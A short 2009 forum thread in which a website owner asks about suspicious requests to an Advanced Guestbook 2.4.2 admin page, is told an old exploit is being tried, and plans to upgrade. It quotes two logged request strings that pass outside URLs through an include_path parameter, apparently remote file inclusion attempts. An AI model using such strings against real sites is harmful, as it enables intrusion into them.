| Author |
Message |
![[Post New]](/forum/templates/html/images/icon_minipost_new.gif) 16/09/2009 07:36:56
|
gang-gang
Newbie
Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline
|
A while ago I downloaded Advance Guest Book 2.4.2 to my website. For some time now, AWSTATS has shown a lot of visits to the admin.php, index.php and image.php pages of the guestbook, mainly by robots. It also indicates a lot of referrals to my site from strange sites (usually on-line gaming or similar) which have no logical relationship with my site (genealogy and trekking). I checked out site visitors via CPANEL and found addresses of the type below
/xfile1/admin.php?include_path=http://randycute.com/zfxid1.txt??
/xfile1/admin.php?include_path=http://www.cyber-marche.fr/media/fx29id.txt??
/xfile/admin.php is the admin page of Advanced Guestbook 2.4.2 on my site - the rest seems to be a redirect to a different site - which look a bit suspect to me. I certainly have not placed an such pathways.
Can you tell me what could be happening? Is there a vulnerability in Advanced Guestbook that is being exploited by dodgy sites? If there is a problem, has it been resolved in a leter version of Advanced Guestbook?
Thanks for any help.
|
|
|
16/09/2009 08:06:30
|
Carbonize
Master
![[Avatar]](/forum/images/avatar/96871336492d73e733f55.jpg)
Joined: 12/06/2003 19:26:08
Messages: 4292
Location: Bristol, UK
Offline
|
They are trying to use an exploit that existed a few years ago.
|
Carbonize
I am not the maker of the Advanced Guestbook
get Lazarus |
|
|
17/09/2009 13:09:31
|
gang-gang
Newbie
Joined: 16/09/2009 07:22:53
Messages: 2
Location: Australia
Offline
|
Thanks Carbonize,
I guess that I should upgrade to 2.4.4 or Lazarus to make the site a bit more secure.
|
|
|
|
|
![[Search]](/forum/templates/html/images/icon_mini_search.gif){kind=icon}
![[Hottest Topics]](/forum/templates/html/images/icon_mini_recentTopics.gif){kind=icon}
![[Members]](/forum/templates/html/images/icon_mini_members.gif){kind=icon}
![[FAQ]](/forum/templates/html/images/icon_mini_faq.gif){kind=icon}
![[Register]](/forum/templates/html/images/icon_mini_register.gif){kind=icon}
Register![[Login]](/forum/templates/html/images/icon_mini_login.gif){kind=icon}
Login
![[Up]](/forum/templates/html/images/icon_up.gif){kind=icon}
![[Email]](/forum/templates/html/images/icon_email.gif){kind=icon}
![[WWW]](/forum/templates/html/images/icon_www.gif){kind=icon}
![[Yahoo!]](/forum/templates/html/images/icon_yim.gif){kind=icon}
![[MSN]](/forum/templates/html/images/icon_msnm.gif){kind=icon}
![[ICQ]](/forum/templates/html/images/icon_icq_add.gif){kind=icon}